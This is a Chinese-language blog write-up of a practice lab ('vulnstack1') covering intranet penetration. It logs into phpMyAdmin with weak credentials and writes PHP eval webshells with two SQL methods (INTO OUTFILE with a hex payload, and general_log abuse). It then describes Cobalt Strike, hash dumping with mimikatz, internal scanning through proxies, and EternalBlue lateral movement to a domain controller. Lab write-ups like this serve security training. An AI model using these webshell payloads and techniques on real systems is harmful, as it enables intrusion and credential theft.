Chen's Blog HomeArchivesTagsCategories
内网渗透之vulnstack1

前言

红日出品的靶机练习

实验环境:

​ 公网:192.168.3.0/24

​ 内网环境未知

目标开放web服务:192.168.3.28

过程

访问目标网站,这里有php探针

image-20200901135926453

探针中可以看到该web服务的绝对路径,扫描一下目录,同时还能得知该服务使用的数据库是Mysql

扫描得到

image-20200901140137381

访问phpMyadmin,弱口令root\root

image-20200901140304416

phpMyadmin这里有两个getshell的思路,参考:Mysql-getshell

1
2
3
(1)
select into outfile
select 0x3C3F706870206576616C28245F504F53545B636D645D293B203F3E into outfile 'C:/phpStudy/www/test1.php'

image-20200901142434516

1
2
3
4
(2)
set global general_log='on';
SET global general_log_file='C:/phpStudy/www/test2.php';
SELECT '<?php eval($_POST["cmd"]);?>';

image-20200901144448565

写入成功

image-20200901144536958

上线CS

image-20200901145824774

image-20200901145925870

image-20200901151337875

1
shell ipconfig /all

image-20200901154932159

直接dumphash

image-20200901151529448

同样的,我们也可以通过运行mimikatz来获得明文密码

image-20200901152026668

这里获得了administrator/1qaz@WSX

然后扫描内网,扫描内网,可以使用sock4a模块

image-20200901152231239

使用proxychain或者Proxifier将流量转发出来,然后利用msf或者nmap等工具进行扫描

image-20200901152752116

也可以使用msf在获得session后,添加静态路由

image-20200901162511223

也可以使用CS自身的net view以及portscan

image-20200901155235588

我们会发现内网中有三台机子,一个是web服务器,一个是域成员,一个域控

image-20200901162714129

都存在永恒之蓝漏洞,445端口都是开着的,因为之前在web服务器中dump出了明文密码,所以域内横向移动一波

image-20200901163631533

image-20200901164130576

获得域控。

后话

这个靶机比较简单,稍作记录,主要是用来练习CS的使用。

Author: 我是小吴啦
Link: http://yoursite.com/2020/09/01/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B9%8Bvulnstack1/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
内网渗透